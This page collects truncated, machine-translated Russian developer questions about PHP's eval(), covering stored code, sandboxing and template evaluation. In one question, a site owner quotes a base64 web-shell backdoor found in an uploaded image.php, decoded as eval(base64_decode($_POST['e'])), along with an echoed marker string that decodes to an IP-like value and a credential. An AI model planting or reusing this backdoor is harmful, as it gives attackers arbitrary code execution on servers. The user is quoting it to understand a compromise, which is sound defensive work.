У меня есть некоторая логика, которая используется для сортировки данных, но в зависимости от пользовательского ввода данные группируются по-разному. Прямо сейчас у меня есть пять различных функций, которые содержат одну и ту же логику, но разные группы. Есть ли способ объединить эти функции и динамически установить значение, которое будет группироваться правильно. Внутри функции эти назначения […]
Официальная документация относительно функции eval() как функции, говорит: Помимо всего прочего, это может быть полезно для хранения кода в текстовом поле базы данных для последующего выполнения. Я серьезно смущен этим. Является ли PHP-документация предлагать хранить строки PHP в базах данных? Какие? Разве это не так опасно? Что делать, если я знаю, что в базе данных […]
Хорошо, вот что я искал в Google: Кажется, есть загруженный файл с именем «image.php», который загружается в каталог qcubed. Этот файл image.php содержит следующий код base64: aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw== декодированный он добавляет к этому: if(isset($_POST['e'])) eval(base64_decode($_POST['e'])); echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032'; В поисках исходной строки я нашел simillar qcubed уязвимости на других сайтах. Декодирование последней эхо-строки, которую я получил: 196.231-172.28:ifacermpubmice:afac42eri02 […]
Я хочу, чтобы PHP мог поместить PHP в базу данных и запустить ее. Я должен сделать это, потому что я храню макеты страниц в базе данных и каждый из наших друг для друга, однако в некоторых случаях я хочу использовать динамический контент для некоторых страниц. Предположим, что $query_from_db – это строка, возвращаемая из базы данных. […]
Возможный дубликат: PHP песочница / дезинфицировать код, переданный create_function Прошу прощения за очень обобщенный вопрос, но мне нужно руководствоваться. Каков наиболее идеальный способ выполнения PHP-кода, представленного пользователем? Подумайте о JSFiddle для PHP. Я знаю, что есть сайты, которые делают это, например, http://writecodeonline.com/php/, но я думаю, что это PHP4 и не работает с половиной кода, который […]
Я попробовал несколько методов, чтобы попытаться получить эту работу, но не повезло! У меня есть страница, подобная этой (Пример): <?php $jj = <<<END ?> <h1>blah blah</h1> <p> blah blah blah blah blah blah blah <?php include("file.php"); ?> blah blah</p> <?php END; eval('?>'.$jj.'<?php '); ?> это не приводит к выводу, что так никогда, не может придумать […]
У меня есть этот HTML / PHP-контент (как строка): <html> <?php my_class->my_function('test.php', 'value1', 'value2'); <?php my_class->my_function('test2.php', 3); </html> То, что my_class-> my_function делает, включает контент в зависимости от отправленных значений. Он может выглядеть примерно так function my_function($file, $value1, $value2) { include $file . $value1 . $value2; } Результат my_function должен выводиться вместо вызова функции. Результат […]
Я знаю, что eval следует избегать в JavaScript по соображениям скорости и безопасности. Но в случае PHP редко упоминается безопасность. Чаще всего это ваша программа работает медленнее, чем она должна из-за случайного использования eval . В каких конкретных ситуациях вы должны использовать eval потому что нет другого пути вокруг него? Для ясности: Мы не говорим […]
В PHP я хочу прочитать файл в переменной и обрабатывать PHP в файле одновременно без использования буферизации вывода. Это возможно? По сути, я хочу, чтобы это удалось, без использования ob_start() : <?php ob_start(); include 'myfile.php'; $xhtml = ob_get_clean(); ?> Возможно ли это в PHP? Обновление: я хочу сделать некоторые более сложные вещи в обратном вызове […]
Мне не нравится задавать такой конкретный вопрос, но я получаю ошибку, которую я не могу понять. Это задание cron, которое работает в течение часа. Я создаю массив задач, каждый из которых имеет проверку даты, которая должна быть eval () 'd. $todo = array(); $todo[] = array( "date('z')%3 == 0", "Task 1" ); $todo[] = array( […]